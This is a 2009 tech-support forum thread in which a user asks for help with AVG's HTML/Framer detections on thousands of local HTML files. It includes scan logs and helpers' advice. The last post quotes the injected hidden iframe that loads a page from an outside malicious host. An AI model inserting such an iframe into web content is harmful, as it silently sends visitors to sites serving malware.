Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

avg 8.5 reports over 2000 html/framer viruses


  • Please log in to reply
8 replies to this topic

#1 DGordon

DGordon

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:02:43 PM

Posted 15 May 2009 - 08:54 PM

Hello. This is my first post here so hope it makes some sense to someone. I normally run Vista32, but also have winXP on a separate HD. I only have one or the other connected just in case I have problems (like now). Yesterday I ran AVG8.5 on Vista just after getting the latest update. It ran clean about 2 weeks ago, but now it detected over 2,000 hits with the HTML/Framer virus! It put them all in the vault, but could not heal the files. I also restored one file and ran the DRWEB scanner and it did not detect this virus. Prior to running avg I updated windows defender and it ran clean also. The only changes in the past week or two have been downloading and installing EA burnout paradise ultimate box demo, a java update and a Firefox update. Also done some normal surfing, but not to any devious sites that I am aware of. Other than the AVG hits, nothing else seemed to be wrong with the system. I have installed all of the Vista updates when they are available.
Although I get no more hits with all of the HTM files in the AVG vault, I have been reluctant to go online, that's why I switched back to winXP to research this.
Several months ago I got hit with a win32 Virut infection and was able fix/repair the files with DrWeb Live. Since then I have installed and enabled AVG8.5, SuperAntiSpyware, Sbybot S&D, AdAware and the add on Vista Firewall. I have always installed the security fixes and defender upgrades, so I am not sure how I could have gotten so many infections without one of these telling me something. I also run Firefox and not IE. I have also downloaded to a thumb drive, malwarebytes and ATF cleaner so that I can run them on the vista machine without going online. Any other help/suggestions would be greatly appreciated.

Thanks, DGordon

BC AdBot (Login to Remove)

 


#2 garmanma

garmanma

    Computer Masochist


  • Members
  • 27,809 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Cleveland, Ohio
  • Local time:06:43 PM

Posted 16 May 2009 - 07:58 PM

If you truly had Virut, I doubt if you removed it entirely with Dr. Web
It's almost impossible. That's why we recommend reformat/reinstall
Run mbam and SAS and post the logs, let's see what they show
Mark
Posted Image
why won't my laptop work?

Having grandkids is God's way of giving you a 2nd chance because you were too busy working your butt off the 1st time around
Do not send me PMs with problems that should be posted in the forums. Keep it in the forums, so everyone benefits
Become a BleepingComputer fan: Facebook and Twitter

#3 DGordon

DGordon
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:02:43 PM

Posted 18 May 2009 - 11:51 AM

Thanks for the reply. I will be out of town for the next week or so. I will rerun SAS (SuperAntiSpyware?) and I assume mbam is MalwareBytes? I will run them both and post the logs. If I can't get it done before next week , should I post another message here? Many Thanks. DGordon

#4 DGordon

DGordon
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:02:43 PM

Posted 19 May 2009 - 08:51 PM

Hi again. Due to a delay in my trip, I will be around most of this week. I ran Mbam and SAS. Sas ran clean so I can't find any log for it. Mbam found 2 reg keys and 1 file infected. I will paste the mbam log here. I hope this is how to do it. It is only one page. It looks like it pasted in here ok. Although it shows no action taken, I did select the items and they were moved to Quarantine. See below the dashed line for a portion of the AVG list. It looks like it found the HTML/Framer in just about every htm and html file on my Vista system. I looked for info on this virus on the AVG site, but found nothing. Many thanks for your assistance.

Malwarebytes' Anti-Malware 1.36
Database version: 1945
Windows 6.0.6001 Service Pack 1

5/18/2009 3:58:18 PM
mbam-log-2009-05-18 (15-58-06).txt

Scan type: Full Scan (C:\|D:\|)
Objects scanned: 388414
Time elapsed: 1 hour(s), 51 minute(s), 29 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 2
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 1

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdss.exe (Security.Hijack) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xcommsvr.exe (Security.Hijack) -> No action taken.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\Windows\System32\FInstall.sys (Backdoor.Bot) -> No action taken.

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The following is about a page of the over 4K hits of the HTML/Framer virus found by AVG 8.5

Scan "Scan whole computer" was finished.,,,
Infections;"4925";"0";"4925",,,
Warnings;"11",,,
Folders selected for scanning:;"Scan whole computer",,,
Scan started:;"Monday,05/18/09,2009," 4:34:40 PM"""
Scan finished:;"Monday,05/18/09,2009," 6:05:33 PM (1 hour(s) 30 minute(s) 53 second(s))"""
Total object scanned:;"970152",,,
User who launched the scan:;"Don",,,
,,,
Infections,,,
File;"Infection";"Result",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\Hu\TOP BANNER.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\Hu\Updating_your_sound_driver.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\Hu\Updating_your_video_driver.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\Hu\Video_Card.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\Hu\Warranty.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\Hu\Welcome.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\CD_DVD_Issues.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\CD_DVD_Issues2.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\CD_DVD_Troubleshooting.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Crash_Issues3.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Crashes.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\DirectX.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Display_Settings.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\EA_HELP_IT.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Emptying_Temporary_Files.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Error_message.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Graphic_corruption.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Installing_the_game.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\LEFT HAND INDEX.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Manually_starting_the_game.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Sound_card.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Starting_the_game.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\TOP BANNER.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Updating_your_sound_driver.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Updating_your_video_driver.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Video_Card.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\It\Welcome.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\blue_screen_.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\cd_dvd_issues.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\cd_dvd_issues2.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\CD_DVD_Troubleshooting.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\crash_issues2.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\crash_issues3.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\crashes.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\display_settings.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\EA_HELP_NL.htm;"Virus found HTML/Framer";"Infected",,,
C:\Program Files\Electronic Arts\Crytek\Crysis\Support\EA Help\NL\Emptying_Temporary_Files.htm;"Virus found HTML/Framer";"Infected",,,

---------------------------------------------------------------------------------------------------------------------------------------------------

#5 garmanma

garmanma

    Computer Masochist


  • Members
  • 27,809 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Cleveland, Ohio
  • Local time:06:43 PM

Posted 20 May 2009 - 07:21 PM

I would really consider option 2, but the choice is yours



Two options left-Post a HJT log or re-install

If you want to give removal of the infection a try, please read the pinned topic titled "Preparation Guide For Use Before Posting A Hijackthis Log". If you cannot complete a step, then skip it and continue with the next. In Step 6 there are instructions for downloading and running DDS which will create a Pseudo HJT Report as part of its log.

When you have done that, post your log in the HijackThis Logs and Malware Removal forum, NOT here, for assistance by the HJT Team Experts. A member of the Team will walk you through, step by step, on how to clean your computer. If you post your log back in this thread, the response from the HJT Team will be delayed because your post will have to be moved. This means it will fall in line behind any others posted that same day.

====================================

Option 2
Some types of malware can result in a system so badly damaged that a Repair Install will NOT help!. Reinstalling Windows without first wiping the entire hard drive with a repartition and/or format will not remove the infection. The reinstall will only overwrite the Windows files. Any malware on the system will still be there afterwards. Starting over by wiping your drive, reformatting, and performing a clean install of the OS or doing a factory restore removes everything and is the safest action.

In case you need help with this, please review:These links include step-by-step instructions with screenshots:Reformatting a hard disk deletes all data. If you decide to reformat, you can back up all your important documents, personal data files and photos. The safest practice is not to backup any executable files (*.exe), screensavers (*.scr) or autorun (.ini) files because they may be infected by malwareware appending itself to the executable. Some types of malware may even disguise itself by adding and hiding its extension to the existing extension of files so be sure you look closely at the full file name. After reformatting, as a precaution, make sure you scan these files with your anti-virus prior to copying them back to your hard drive.

Note: If your using an IBM, HP, Compaq or Dell machine, you may not have an original XP CD Disk. By policy Microsoft no longer allows OEM manufactures to include the original Windows XP CD-ROM on computers sold with Windows preinstalled. Instead, most computers manufactured and sold by OEM vendors come with a vendor-specific Recovery Disk or Recovery Partition for performing a clean "factory restore" that will reformat your hard drive, remove all data and restore the computer to the state it was in when you first purchased it.

If you need additional assistance with reformatting, you can start a new topic in the Windows XP Home and Professional forum.
Mark
Posted Image
why won't my laptop work?

Having grandkids is God's way of giving you a 2nd chance because you were too busy working your butt off the 1st time around
Do not send me PMs with problems that should be posted in the forums. Keep it in the forums, so everyone benefits
Become a BleepingComputer fan: Facebook and Twitter

#6 DGordon

DGordon
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:02:43 PM

Posted 28 May 2009 - 12:02 PM

Mark, thanks for the response. I have a few more questions before I decide to try removal or format/reinstall. Briefly, when I got hit a few months ago with Virut, I had downloaded 2 shareware helicopter sims and the original sites sent me off to a mirror sites for the downloads. Normally I don't download except from the originals, but that was the only option. After getting the files that were scanned on download as OK, I set up Vista in an offline mode and disconnected the modem. I then scanned the two files with AVG 7.5 with current signature files and they said OK so I installed the programs. I played with them a while and noticed the response got choppy a few times so I looked at the task manager and while I normally have only 20 processes running in my offline setup, this time there were about 25. The extras were sopidkc.exe, rundll33.exe, mabidwe.exe and msrstart.exe. I then went online with my XP system and several google hits said these were due to virut. I went back to vista and manually found and moved these exe's to a folder on my D: drive and renamed them to txt files. Then I ran a full scan of avg, spybot s&d, windows defender and SAS. They found a few things like Trojan.StartPage.1505, TrojanPacked.149 and several tracking cookies. After this avg7.5 ran ok but I stayed offline on Vista. I did more checking on my XP machine and found on AVG's website a virut removal tool called rmvirut. I dowloaded (on XP) and moved it to vista with usb drive. When I ran it, it said I had over 2000 virut infected files that it could not clean (I think because of the operating system not allowing access). On doing more research I found the Dr Web live boot disk that runs on a small linux system bootable from the CD. I did this and it also found over 2000 infected files. I tried the repair option and to my surprise it said it repaired all but 2 or 3 files that I deleted. I then rebooted vista and ran the avg rmvirut and it found no more infections. I also ran just about everything else I could find with no more errors. I ran the machine offline several days and ran many of the programs that were infected, constantly rescanning with no errors and no strange processes showing up. I also installed avg 8.5 and enabled all the protection as well as the latest spybot s&d with max protection. I installed the Vista Firewall program that allows control of in and out and set it up initially to not allow anything without a pop up message. I then went online and watched closely for anything strange. It all seemed ok, so I allowed Vista update to run including the latest defender signatures. Then I went offline and rescanned with everything I had and found nothing. I did this on and off for about a week or two, then assumed I was OK once again. Then about two weeks ago I downloaded the latest AVG 8.5 sigs, ran a complete scan and it then found the thousands of HTML/Framer viruses. I ran everything else with no errors. Also last week I ran AVAST antivirus and it found NO problems with the files detected by avg. I then took one of the "infected" files and renamed it to a .txt file and put it on a usb drive. Avg scan on vista again detected the html/framer even when renamed to .txt . I then made certain that autostart was off on my xp machine (deleted the reg key that controls autostart) and scanned the drive with avg 7.5 and it found NO problem....

Sorry, I thought this would be brief but I am at the bottom of the page already. I hope I have been articulate enough so you can follow this. My main concern is; Is this really a virus? Is there somewhere I could upload this file to be checked specifically for the html/framer? Could this be a false postive due to my having too many malware programs installed (although the same setup ran error free the week before)? I have avg8.5 as the only active antivirus, but windows defender and Spybot are also in an active protect mode as well.

Another question is if I try to fix this (with your help), can this be done without bringing the Vista machine online? I am really concerned about going online at this point. Do you think that this html/framer could be related in any way to the previous Virut problem? One other thing that may be related is that before finding the current framer problem, I had a popup about updating java and macromedia flash that I did accept and run. This was a day or two before I ran the full scan to find the problem. I did go in and uninstall the updates just in case. In retrospect this is something I will never do again except thru window update or going directly to the site.....

Thanks again for your time.
DGordon

#7 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,895 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:05:43 PM

Posted 28 May 2009 - 12:30 PM

HTML/Framer.Z is a malicious HTML files usually sent via spam email messages. It contains an “iframe” HTML tag that can redirect users to a site with malicious script to download additional threats.

HTML/Framer.Z

This type of issue is caused by when the webserver itself gets compromised and the actually HTML code itself is changed... Normally it's a linked script that is added to the code itself...

AVG Forums: HTML/Framer
AVG Forums: HTML/Framer.Z

Edited by quietman7, 28 May 2009 - 12:31 PM.

.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#8 DGordon

DGordon
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:02:43 PM

Posted 31 May 2009 - 01:18 PM

Thanks for the response. The avg refs lead to a dead end, although the question is similar to my problem. Is there anyone that can help me decide on trying to fix (not just remove) all of these htm and html files. Please read my previous post. Also what would be my exposure if I did go online to get the latest avg update to see if anything has changed? Anyone care to speculate on why or how the html/framer virus would be on over 6,000 html's if this is not a false positive? I am so frustrated by the so called SECURITY of Vista that I am about to dump it and go back to XP.....

#9 DGordon

DGordon
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:02:43 PM

Posted 31 May 2009 - 02:18 PM

Hi again. I was doing some research on the html/framer and after renaming one of the htm files to .txt, I found this at the end of the file;

</form>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
</body>
</html>

Is this the code that redirects to a website? If so, what part of this would I have to delete/change. Also does this for sure mean this is a legit virus?




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users